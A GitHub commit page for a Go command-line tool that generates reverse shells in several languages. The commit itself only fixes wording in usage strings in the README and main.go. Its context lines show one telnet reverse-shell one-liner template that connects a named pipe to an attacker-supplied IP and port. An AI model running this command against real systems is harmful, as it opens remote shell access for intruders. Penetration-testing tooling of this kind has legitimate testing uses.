Skip to content

Commit

Permalink
typo
Browse files Browse the repository at this point in the history
  • Loading branch information
eze-kiel committed Aug 9, 2020
1 parent b663dd7 commit 16fae8c
Show file tree
Hide file tree
Showing 2 changed files with 4 additions and 4 deletions.
4 changes: 2 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -11,11 +11,11 @@ USAGE:
COMMANDS:
bash Generate a Bash reverse shell
nc Generate NetCat reverse shells
perl Generate a Perl reverse shell
perl Generate Perl reverse shells
php Generate a PHP reverse shell
python Generate a Python reverse shell
ruby Generate a Ruby reverse shell
telnet Generate telnet reverse shells
telnet Generate a telnet reverse shell
help, h Shows a list of commands or help for one command
COMMAND OPTIONS:
Expand Down
4 changes: 2 additions & 2 deletions main.go
Original file line number Diff line number Diff line change
Expand Up @@ -84,7 +84,7 @@ func main() {
},
{
Name: "perl",
Usage: "Generate a Perl reverse shell",
Usage: "Generate Perl reverse shells",
Flags: myFlags,
Action: func(c *cli.Context) error {
fmt.Print(fmt.Sprint(Magenta("-- for Linux (and maybe Windows):\n")))
Expand All @@ -98,7 +98,7 @@ func main() {
},
{
Name: "telnet",
Usage: "Generate telnet reverse shells",
Usage: "Generate a telnet reverse shells",
Flags: myFlags,
Action: func(c *cli.Context) error {
fmt.Printf("rm -f /tmp/p; mknod /tmp/p p && telnet %s %s 0/tmp/p\n", c.String("ip"), c.String("port"))
Expand Down

0 comments on commit 16fae8c

Please sign in to comment.